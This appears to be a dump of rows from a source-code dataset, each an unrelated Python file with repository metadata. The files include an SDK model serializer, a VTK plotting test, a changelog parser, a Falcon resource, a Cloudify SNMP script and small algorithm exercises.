        Sequence of historical values of the asset property, e.g. [1,2]

        :param values: The values of this RawValue.
        :type values: list[object]
        """
        self._values = values
    def to_dict(self):
        """Returns the model properties as a dict"""
        result = {}
        for attr, _ in six.iteritems(self.openapi_types):
            value = getattr(self, attr)
            if isinstance(value, list):
                # Recursively serialize list elements that are themselves models.
                result[attr] = list(map(
                    lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
                    value
                ))
            elif hasattr(value, "to_dict"):
                result[attr] = value.to_dict()
            elif isinstance(value, dict):
                # Recursively serialize dict values that are themselves models.
                result[attr] = dict(map(
                    lambda item: (item[0], item[1].to_dict())
                    if hasattr(item[1], "to_dict") else item,
                    value.items()
                ))
            else:
                if attr in self.sensitive_list:
                    # Mask sensitive attributes in the serialized output.
                    result[attr] = "****"
                else:
                    result[attr] = value
        return result
    def to_str(self):
        """Returns the string representation of the model"""
        import simplejson as json
        if six.PY2:
            # Python 2 only: force UTF-8 default encoding before JSON dumping.
            import sys
            reload(sys)
            sys.setdefaultencoding("utf-8")
        return json.dumps(sanitize_for_serialization(self), ensure_ascii=False)
    def __repr__(self):
        """For `print`"""
        return self.to_str()
    def __eq__(self, other):
        """Returns true if both objects are equal"""
        if not isinstance(other, RawValue):
            return False
        return self.__dict__ == other.__dict__
    def __ne__(self, other):
        """Returns true if both objects are not equal"""
        return not self == other
| [
"hwcloudsdk@huawei.com"
] | hwcloudsdk@huawei.com |
06c2eca239012d6d77d4c43bd14eb9ece6e2e980 | 5a6937aa6cea8312bc8964f86f77f4595d1b940f | /Testing/test_mypoints_plot2.py | 54c7c5566745e968ea82108d41f131f4c0c5c225 | [] | no_license | emonson/MultiScaleSVD | 39d8059f3f286a1936c6634740d1bd1e87ddbc7f | c231859bffe1eb0a7eaf15fd4d1a4c8ca9cfe8ed | refs/heads/master | 2020-12-24T13:17:53.369613 | 2012-12-19T18:09:39 | 2012-12-19T18:09:39 | 699,727 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,206 | py | # Translated to Python from [VTK]/Charts/Testing/Cxx/TestLinePlot.cxx
# This version is for testing reworked subclasses 8/13/2010
import vtk
from vtk.util import numpy_support as VN
import numpy as N
import math
import vtkvtg
from data_source import DataSource
# --- Data / scene setup -------------------------------------------------
data_file = '/Users/emonson/Data/Fodava/EMoGWDataSets/mnist12_1k_20101119.mat'
# DataSource loads .mat file and can generate data from it for other views
ds = DataSource(data_file)
# Set up a 2D scene, add an XY chart to it
view = vtk.vtkContextView()
view.GetRenderWindow().SetSize(400, 300)
# Testing my custom chart class which has image hover tooltips
chart = vtkvtg.vtkMyChartXY()
# Mouse bindings: middle button = pan, right = zoom, left = select
chart.SetActionToButton(vtk.vtkChart.PAN, 2)
chart.SetActionToButton(vtk.vtkChart.ZOOM, 4)
chart.SetActionToButton(vtk.vtkChart.SELECT, 1)
view.GetScene().AddItem(chart)
# Create a annotation link to access selection in parallel coordinates view
annotationLink = vtk.vtkAnnotationLink()
# If you don't set the FieldType explicitly it ends up as UNKNOWN (as of 21 Feb 2010)
# See vtkSelectionNode doc for field and content type enum values
annotationLink.GetCurrentSelection().GetNode(0).SetFieldType(1) # Point
annotationLink.GetCurrentSelection().GetNode(0).SetContentType(4) # Indices
# Connect the annotation link to the parallel coordinates representation
chart.SetAnnotationLink(annotationLink)
# --- Plot the 2D scale coefficients of one node of the decomposition ----
test_id = 3
table = ds.GetNodeOneScaleCoeffTable(test_id)
chart.ClearPlots()
line1 = vtkvtg.vtkMyPlotPoints()
chart.AddPlot(line1) # POINTS
line1.SetInput(table, 0, 1)
line1.SetMarkerStyle(2)
line1.SetColor(0, 0, 0, 255)
# Tooltip image stack will now be owned by the tooltip, so need to do that differently...
id_list = ds.PointsInNet[test_id]
image_stack = ds.GetProjectedImages(id_list)
# DEBUG
writer = vtk.vtkXMLImageDataWriter()
writer.SetFileName('out.vti')
writer.SetInput(image_stack)
writer.Write()
chart.SetTooltipImageStack(image_stack)
chart.SetTooltipShowImage(True)
# chart.SetTooltipImageScalingFactor(2.0)
chart.SetTooltipImageTargetSize(40)
# Set up annotation link which will carry indices to parallel coordinates chart
# for highlighting outside selections (e.g. back from image_flow)
# This needs to carry indices, while image_flow link outputs pedigree ids
# so conversion happens in HighlightSelectionCallback
highlight_link_idxs = vtk.vtkAnnotationLink()
highlight_link_idxs.GetCurrentSelection().GetNode(0).SetFieldType(1) # Point
highlight_link_idxs.GetCurrentSelection().GetNode(0).SetContentType(4) # 2 = PedigreeIds, 4 = Indices
chart.SetHighlightLink(highlight_link_idxs)
# Finally render the scene and compare the image to a reference image
# view.GetRenderWindow().SetMultiSamples(0)
def selectionCallback(caller, event):
    # Observer for the annotation link: print the selected point indices
    # whenever the chart selection changes (Python 2 print statement).
    annSel = annotationLink.GetCurrentSelection()
    if annSel.GetNumberOfNodes() > 0:
        idxArr = annSel.GetNode(0).GetSelectionList()
        if idxArr.GetNumberOfTuples() > 0:
            print VN.vtk_to_numpy(idxArr)
annotationLink.AddObserver("AnnotationChangedEvent",selectionCallback)
# view.ResetCamera()
view.Render()
# Fill selection link with dummy IDs
id_array = N.array([0],dtype='int64')
id_list = VN.numpy_to_vtkIdTypeArray(id_array)
highlight_link_idxs.GetCurrentSelection().GetNode(0).SetSelectionList(id_list)
highlight_link_idxs.InvokeEvent("AnnotationChangedEvent")
# Set up annotation link which will carry indices to parallel coordinates chart
# for highlighting outside selections (e.g. back from image_flow)
# This needs to carry indices, while image_flow link outputs pedigree ids
# so conversion happens in HighlightSelectionCallback
data_col_idxs = vtk.vtkAnnotationLink()
data_col_idxs.GetCurrentSelection().GetNode(0).SetFieldType(1) # Point
data_col_idxs.GetCurrentSelection().GetNode(0).SetContentType(4) # 2 = PedigreeIds, 4 = Indices
chart.SetDataColumnsLink(data_col_idxs)
# Fill selection link with dummy IDs
col_array = N.array([1,2],dtype='int64')
col_list = VN.numpy_to_vtkIdTypeArray(col_array)
data_col_idxs.GetCurrentSelection().GetNode(0).SetSelectionList(col_list)
data_col_idxs.InvokeEvent("AnnotationChangedEvent")
# Start interaction event loop
view.GetInteractor().Start()
| [
"emonson@cs.duke.edu"
] | emonson@cs.duke.edu |
63fcd4d76ce8b2403bd98acdaf30ee839d32b68d | 8337bfdd69708f4bfbe345240dcccc7b8c7f5718 | /loglette/parser/loglette/parser.py | 7e501e1c1f1c862b4151be8d842b3feac3762e3d | [
"MIT"
] | permissive | siku2/Loglette | 8f1c12ceb7f1009b5eab503ab7608b292be98739 | d69f99c3ead2bb24f2aa491a61a7f82cb9ca8095 | refs/heads/master | 2020-03-24T07:10:26.454200 | 2018-08-01T13:01:02 | 2018-08-01T13:01:02 | 142,555,185 | 1 | 0 | MIT | 2018-08-01T13:01:03 | 2018-07-27T09:12:51 | Python | UTF-8 | Python | false | false | 1,705 | py | from typing import Dict, List, Tuple
from . import pattern
from .. import Parser, parser
@parser("loglette")
class LogletteParser(Parser):
    """Parser for the native loglette changelog format."""

    @classmethod
    def parse_value(cls, value: str, text_style: str = None) -> str:
        """Normalise a raw value according to its text-style marker.

        "|" strips surrounding whitespace only, ">" additionally folds
        internal whitespace runs into single spaces, and no marker
        returns the value untouched.
        """
        if not text_style:
            return value
        if text_style == "|":
            return value.strip()
        if text_style == ">":
            return pattern.WHITESPACE_STRIPPER.sub(" ", value).strip()
        raise SyntaxError(f"Unknown text style ({text_style})")

    def parse_header(self, text: str) -> Dict[str, str]:
        """Extract the header key/value pairs from *text*."""
        headers = {}
        for match in pattern.HEADER_PARSER.finditer(text):
            name, style, raw = match.groups(None)
            headers[name] = self.parse_value(raw, style)
        # "release_date" mirrors "release" (None when absent).
        headers["release_date"] = headers.get("release")
        return headers

    def parse_changes(self, text: str) -> List[Dict[str, str]]:
        """Extract the individual change entries from *text*."""
        entries = []
        for match in pattern.CHANGES_PARSER.finditer(text):
            kind, priority, style, raw = match.groups(None)
            entries.append({
                "type": kind.upper(),
                "priority": priority,
                "text": self.parse_value(raw, style),
            })
        return entries

    @classmethod
    def split_changelog(cls, text: str) -> Tuple[str, str]:
        """Split a single changelog into its (header, changes) halves."""
        head, body = pattern.HEADER_SPLITTER.split(text, maxsplit=1)
        return head, body

    @classmethod
    def split_changelogs(cls, text: str) -> List[str]:
        """Split a document into individual changelog chunks."""
        return pattern.CHANGELOG_SPLITTER.split(text)
| [
"siku2@outlook.com"
] | siku2@outlook.com |
84c46959396968ef4f12dd949fddc9e19ebf9cf9 | 41f13d82b46b158c5c2997915122e4f5e8a700fa | /falcon/main/views/things.py | ba065c6c1f18b0ea2b7e65e393bbb668750a72b1 | [] | no_license | ashishRay12/server | 0959e2e5789f886b327f51a83487fd3919593b22 | bb68c14398390e004148e848df234277f382a50c | refs/heads/master | 2021-01-10T13:58:43.307036 | 2016-03-21T16:10:35 | 2016-03-21T16:10:35 | 54,403,543 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 572 | py | import falcon
class ThingsResource:
    """Falcon resource exposing plain-text GET/POST acknowledgement responders.

    ``form`` and ``files`` are injected by a request hook (see common.py).
    They default to ``None`` rather than mutable ``{}`` literals to avoid
    the shared-mutable-default-argument pitfall; neither is read here.
    """

    def on_get(self, req, resp, form=None, files=None):
        """Handle GET requests with a plain-text acknowledgement."""
        resp.status = falcon.HTTP_200  # This is the default status
        resp.body = ("GET request accepted")

    def on_post(self, req, resp, form=None, files=None):
        """Handle POST requests with a plain-text acknowledgement."""
        resp.status = falcon.HTTP_200  # This is the default status
        # resp.content_type = 'application/text'
        # print(form["id"]) -> value captured from hook defined in common.py
        resp.body = ("POST request accepted")
| [
"johndoe@example.com"
] | johndoe@example.com |
8145c8f75fc9b4722eb29c669bff3aba2ff807e5 | 1ffcad5482a95e8133b0adbd5fb38652c765a7d6 | /COT/remove_file.py | 0354f162faa9788f18e5031217ff5a01cce74652 | [
"MIT"
] | permissive | duanshuaimin/cot | 71f51d1270de2609c99ac302ed932d4c72e83c77 | 6da4345f57849620765e88d1e406366509070745 | refs/heads/master | 2021-01-21T06:38:45.458816 | 2017-02-21T15:13:09 | 2017-02-21T15:13:09 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,428 | py | #!/usr/bin/env python
#
# remove_file.py - Implements "cot remove-file" command
#
# June 2016, Glenn F. Matthews
# Copyright (c) 2016 the COT project developers.
# See the COPYRIGHT.txt file at the top-level directory of this distribution
# and at https://github.com/glennmatthews/cot/blob/master/COPYRIGHT.txt.
#
# This file is part of the Common OVF Tool (COT) project.
# It is subject to the license terms in the LICENSE.txt file found in the
# top-level directory of this distribution and at
# https://github.com/glennmatthews/cot/blob/master/LICENSE.txt. No part
# of COT, including this file, may be copied, modified, propagated, or
# distributed except according to the terms contained in the LICENSE.txt file.
"""Module for removing files from VM definitions.
.. autosummary::
COTRemoveFile
"""
import logging
from COT.submodule import COTSubmodule
from COT.data_validation import check_for_conflict, match_or_die
from COT.data_validation import InvalidInputError
logger = logging.getLogger(__name__)
class COTRemoveFile(COTSubmodule):
    """Remove a file (such as a README) from the package.
    Inherited attributes:
    :attr:`~COTGenericSubmodule.ui`,
    :attr:`~COTSubmodule.package`,
    :attr:`~COTSubmodule.output`
    Attributes:
    :attr:`file_path`,
    :attr:`file_id`
    """
    def __init__(self, ui):
        """Instantiate this submodule with the given UI.
        Args:
            ui (UI): User interface instance.
        """
        super(COTRemoveFile, self).__init__(ui)
        # Either selector may identify the file; run() fills in the other.
        self.file_path = None
        """File name or path to be removed from the package."""
        self.file_id = None
        """File identifier to be removed from the package."""
    def ready_to_run(self):
        """Check whether the module is ready to :meth:`run`.
        Returns:
            tuple: ``(True, ready_message)`` or ``(False, reason_why_not)``
        """
        # At least one of the two selectors (path or id) is required.
        if self.file_path is None and self.file_id is None:
            return False, "No file information provided!"
        return super(COTRemoveFile, self).ready_to_run()
    def run(self):
        """Do the actual work of this submodule.
        Raises:
            InvalidInputError: if :func:`ready_to_run` reports ``False``
        """
        super(COTRemoveFile, self).run()
        vm = self.vm
        # Find the existing file entry.
        # There may also be a disk entry for this file.
        # There may also be a disk device that maps this file to a drive.
        (file1, disk1, _, disk_dev1) = vm.search_from_filename(self.file_path)
        (file2, disk2, _, disk_dev2) = vm.search_from_file_id(self.file_id)
        # The path-based and id-based lookups must agree (or one be empty);
        # check_for_conflict is expected to reject conflicting non-None results.
        file_obj = check_for_conflict("file to remove", [file1, file2])
        disk = check_for_conflict("disk associated with file to remove",
                                  [disk1, disk2])
        disk_drive = check_for_conflict("disk drive mapping this file",
                                        [disk_dev1, disk_dev2])
        if file_obj is None:
            raise InvalidInputError("No such file found")
        # Fill in whichever selector the user omitted; if both were given,
        # match_or_die verifies they describe the same file entry.
        if self.file_id is None:
            self.file_id = vm.get_id_from_file(file_obj)
        else:
            match_or_die('--file-id', self.file_id,
                         'file id in OVF', vm.get_id_from_file(file_obj))
        if self.file_path is None:
            self.file_path = vm.get_path_from_file(file_obj)
        else:
            match_or_die('--file-path', self.file_path,
                         'file path in OVF', vm.get_path_from_file(file_obj))
        # Describe everything that will be removed before asking the user.
        prompt_info = "file '{0}' (ID '{1}')".format(self.file_path,
                                                     self.file_id)
        if disk is not None:
            prompt_info += " and disk '{0}'".format(vm.get_id_from_disk(disk))
        if disk_drive is not None:
            prompt_info += " and device '{0}'".format(
                vm.device_info_str(disk_drive))
        self.ui.confirm_or_die("Remove {0}?".format(prompt_info))
        # Remove the file plus any associated disk entry / drive mapping.
        vm.remove_file(file_obj, disk=disk,
                       disk_drive=disk_drive)
    def create_subparser(self):
        """Create 'remove-file' CLI subparser."""
        p = self.ui.add_subparser(
            'remove-file',
            aliases=['delete-file'],
            add_help=False,
            usage=self.ui.fill_usage("remove-file", [
                "[-f FILE_PATH] [-i FILE_ID] PACKAGE [-o OUTPUT]",
            ]),
            help="Remove a file from an OVF package",
            description="""
Remove a file from the given OVF. Will prompt for confirmation unless
--force is set.""")
        group = p.add_argument_group("general options")
        group.add_argument('-h', '--help', action='help',
                           help="""Show this help message and exit""")
        group.add_argument('-o', '--output',
                           help="""Name/path of new OVF/OVA package to """
                           """create instead of updating the existing OVF""")
        # Either selection option suffices; run() checks their consistency.
        group = p.add_argument_group("file selection options")
        group.add_argument('-f', '--file-path',
                           help="""File name or path within the package""")
        group.add_argument('-i', '--file-id',
                           help="""File ID string within the package""")
        p.add_argument('PACKAGE',
                       help="""Package, OVF descriptor or OVA file to edit""")
        p.set_defaults(instance=self)
| [
"glenn@e-dad.net"
] | glenn@e-dad.net |
a1e1e36aac226ae6fb4c681d891bb90b5b64a966 | b9a86fac908ef196537f3e86bbf1776056e0354f | /gatifore_snmp/scripts/append_diamond_conf.py | 0611f0a49c8085d13c79f5258fb328dc33a9e9b4 | [] | no_license | tamirko/cfyApps | a2ff8514a6591f004a0d57cb1feaad5b267e7f75 | d7f9b751bc7d1c7bf3d07c36e6f9737c83bd1c78 | refs/heads/master | 2021-01-17T00:53:14.475503 | 2017-11-28T08:09:34 | 2017-11-28T08:09:34 | 26,909,041 | 1 | 4 | null | null | null | null | UTF-8 | Python | false | false | 2,161 | py | from cloudify import ctx
from cloudify.state import ctx_parameters as inputs
APPEND_DIAMOND_STR = "append_diamond_conf"
ctx.logger.info("Starting {0} ... ".format(APPEND_DIAMOND_STR))
target_instance = ctx.target.instance
ctx.logger.info("{0} target_instance {1} ... ".format(APPEND_DIAMOND_STR, target_instance))
target_node = ctx.target.node
ctx.logger.info("{0} target_node {1} ... ".format(APPEND_DIAMOND_STR, target_node))
src_instance = ctx.source.instance
ctx.logger.info("{0} src_instance {1} ... ".format(APPEND_DIAMOND_STR, src_instance))
ctx.logger.info("{0} ctx.target.node.name {1} ... ".format(APPEND_DIAMOND_STR, ctx.target.node.name))
config = src_instance.runtime_properties.get('snmp_collector_config', {})
for key, val in config.items():
if isinstance(val, dict):
ctx.logger.info(" {0} config.{1} b4 -> ... ".format(APPEND_DIAMOND_STR, key))
for k, v in val.items():
ctx.logger.info(" {0} config.{1} b4 -> {2}:{3} ... ".format(APPEND_DIAMOND_STR, key, k, v))
else:
ctx.logger.info("{0} config b4 -> {1}:{2} ... ".format(APPEND_DIAMOND_STR, key, str(val)))
devices_conf = config.get('devices', {})
devices_conf[ctx.target.node.name] = device_config = {}
device_config['node_instance_id'] = target_instance.id
device_config['node_id'] = target_node.id
if 'host' in inputs:
device_config['host'] = inputs.host
else:
device_config['host'] = target_instance.host_ip
ctx.logger.info("xxx {0} host is {1} ... yyy".format(APPEND_DIAMOND_STR, device_config['host']))
device_config['port'] = inputs.port
device_config['community'] = inputs.community
device_config['oids'] = inputs.oids
config['devices'] = devices_conf
for key, val in config.items():
if isinstance(val, dict):
ctx.logger.info(" {0} config.{1} after -> ... ".format(APPEND_DIAMOND_STR, key))
for k, v in val.items():
ctx.logger.info(" {0} config.{1} after -> {2}:{3} ... ".format(APPEND_DIAMOND_STR, key, k, v))
else:
ctx.logger.info("{0} config after -> {1}:{2} ... ".format(APPEND_DIAMOND_STR, key, str(val)))
src_instance.runtime_properties['snmp_collector_config'] = config
| [
"tamir@gigaspaces.com"
] | tamir@gigaspaces.com |
25c50028e507c050a5742263271cfb361423e81d | c2f6722d51f119b9f588cbea4121d2f8fddafcd2 | /bdv/code/procdistrib/clnt_processes.py | 4ba0c9d0a721669c97972e490f425b8b7b113ac3 | [] | no_license | facundobatista/blog | f4c670b48b52b0e651c7a89ad9de702abd16a39c | 4461457c185ef3949e0d6b1398b0a7feb4a68cde | refs/heads/master | 2023-07-09T09:02:17.503586 | 2023-07-04T00:36:22 | 2023-07-04T00:36:22 | 30,439,511 | 3 | 0 | null | 2019-01-24T15:43:51 | 2015-02-07T00:33:57 | PHP | UTF-8 | Python | false | false | 634 | py | import xmlrpclib, time, sys
import reparteThreads
#reparteThreads.debugmode = True
usage = """
Usar client_processes.py sever:port [[server:port] ...]
ej: client_processes.py localhost:9000 10.12.33.112:9000 10.12.33.113:9000
"""
if len(sys.argv) < 2:
print usage
sys.exit(-1)
servers = sys.argv[1:]
servers = [xmlrpclib.Server('http://' + x) for x in servers]
repartidor = reparteThreads.Repartidor(servers, "factoriz_sum")
base = 23434252232434
tini = time.time()
for i in range(10):
repartidor.enviar(str(base+i))
resultados = repartidor.terminar()
print "\n".join(resultados)
print "Tiempo:", time.time() - tini
| [
"facundo@taniquetil.com.ar"
] | facundo@taniquetil.com.ar |
6143d20eef5d2414ba5d2734ab41250ff4d2ef98 | 477eae855f1f295c7ade594ee64fc3501ac59ef9 | /recipes/D/test_package/conanfile.py | 4bb3be2882b9b6c86b50ae84192ed0ea228efe0c | [] | no_license | xingao0803/skynet_example | b5fa8e2f5dac0066c773bf9624e803105787ed5c | f955dde1041ef264dc33e239771190755b43104a | refs/heads/master | 2020-03-31T08:07:30.670256 | 2018-10-13T03:13:29 | 2018-10-13T03:13:29 | 152,046,747 | 0 | 1 | null | 2018-10-08T08:43:38 | 2018-10-08T08:43:38 | null | UTF-8 | Python | false | false | 334 | py | from conans import ConanFile
import os
channel = os.getenv("CONAN_CHANNEL", "stable")
username = os.getenv("CONAN_USERNAME", "lasote")
class BTestConan(ConanFile):
settings = "os", "compiler", "build_type", "arch"
requires = "LIB_D/1.0@%s/%s" % (username, channel)
def test(self):
self.output.info("Test OK!") | [
"lasote@gmail.com"
] | lasote@gmail.com |
d417d2e64005189a9b67e0af6c9b3badc1fb0ef0 | 55c250525bd7198ac905b1f2f86d16a44f73e03a | /Python/Games/Tetris/modules/gameboard.py | d279d17889bfea61c36f40ae050f4df4273e990a | [] | no_license | NateWeiler/Resources | 213d18ba86f7cc9d845741b8571b9e2c2c6be916 | bd4a8a82a3e83a381c97d19e5df42cbababfc66c | refs/heads/master | 2023-09-03T17:50:31.937137 | 2023-08-28T23:50:57 | 2023-08-28T23:50:57 | 267,368,545 | 2 | 1 | null | 2022-09-08T15:20:18 | 2020-05-27T16:18:17 | null | UTF-8 | Python | false | false | 129 | py | version https://git-lfs.github.com/spec/v1
oid sha256:9408a572aa27ab62fce8357d7b6c321f2df4cfaf6de7a27be290c97d70f3178a
size 8445
| [
"nateweiler84@gmail.com"
] | nateweiler84@gmail.com |
ea659a93d51874fb9441c1e921808db5c68cdfe4 | 6e601105760f09d3c9f5306e18e4cf085f0bb4a2 | /1000-9999/1449.py | 9e9b7eaf20d4ff4f2f80aa9e6ca37c6e2ba89700 | [] | no_license | WSJI0/BOJ | 6412f69fddd46c4bcc96377e2b6e013f3bb1b524 | 160d8c13f72d7da835d938686f433e7b245be682 | refs/heads/master | 2023-07-06T15:35:50.815021 | 2023-07-04T01:39:48 | 2023-07-04T01:39:48 | 199,650,520 | 2 | 0 | null | 2020-04-20T09:03:03 | 2019-07-30T12:48:37 | Python | UTF-8 | Python | false | false | 221 | py | '''
1449번
수리공 항승
'''
import sys
input=sys.stdin.readline
n, l=map(int, input().split())
a=list(map(int, input().split()))
a.sort()
L=0
cnt=0
for R in a:
if L<R:
L=R+l-1
cnt+=1
print(cnt) | [
"lifedev@naver.com"
] | lifedev@naver.com |
2ca0d45e9ea3b99ccef5f4796d87ba41c840ec09 | 8a780cb47eac9da046bdb5d6917f97a086887603 | /problems/knight_probability_in_chessboard/solution.py | 10dda0383885961f2992842af8d8eaf2428dcd79 | [] | no_license | dengl11/Leetcode | d16315bc98842922569a5526d71b7fd0609ee9fb | 43a5e436b6ec8950c6952554329ae0314430afea | refs/heads/master | 2022-12-20T03:15:30.993739 | 2020-09-05T01:04:08 | 2020-09-05T01:04:08 | 279,178,665 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 672 | py | class Solution:
def knightProbability(self, N: int, K: int, r: int, c: int) -> float:
cache = {} # {(i, j, k): prob of next being on-board}
def query(i, j, K):
if i < 0 or i >= N or j < 0 or j >= N: return 0
if K == 0: return 1
if (i, j, K) in cache: return cache[(i, j, K)]
ans = 0
for di, dj in [(1, 2), (1, -2), (2, 1), (2, -1), (-1, 2), (-1, -2), (-2, 1), (-2, -1)]:
ii, jj = i + di, j + dj
ans += query(ii, jj, K-1)
ans = ans / 8
cache[(i, j, K)] = ans
return ans
return query(r, c, K)
| [
"ldeng1314@gmail.com"
] | ldeng1314@gmail.com |
913f92b3adfc7f05a0427c18c2608c21d2b86f48 | 21540ab033e180a3d94b270b7faffac7fe4af68f | /wordshop5/Exercise_1-3_page_158/Exercise_2.py | 2d13b4e75725362eed75c0970cc5a55c08a9b96d | [] | no_license | tuan102081/wordshop1.2.3.5 | eaa344bdb04f565d1354b9476b4d4ecafc5cc7f3 | 70e75b56f48a2e5b1622d956f33831f80e64d368 | refs/heads/master | 2023-07-14T23:26:31.089484 | 2021-08-30T18:53:24 | 2021-08-30T18:53:24 | 401,411,439 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 640 | py | """
Author: Nguyen Duy Tuan
Date: 31/08/2021
Program: Exercise_02.py
Problem:
Assume that the variable data refers to the dictionary {'b':20, 'a':35}. Write the
values of the following expressions:
a. data['a']
b. data.get('c', None)
c. len(data)
d. data.keys()
e. data.values()
f. data.pop('b')
g. data # After the pop above
Solution:
display:
35
None
2
dict_keys(['b', 'a'])
dict_values([20, 35])
20
{'a': 35}
"""
# Exercise 2: evaluate each dictionary expression in sequence and print it.
data = {'b': 20, 'a': 35}
probes = (
    lambda d: d['a'],            # value for key 'a' -> 35
    lambda d: d.get('c', None),  # missing key with default -> None
    lambda d: len(d),            # number of entries -> 2
    lambda d: d.keys(),          # view of keys
    lambda d: d.values(),        # view of values
    lambda d: d.pop('b'),        # removes 'b' and returns 20
)
for probe in probes:
    print(probe(data))
print(data) | [
"you@example.com"
] | you@example.com |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.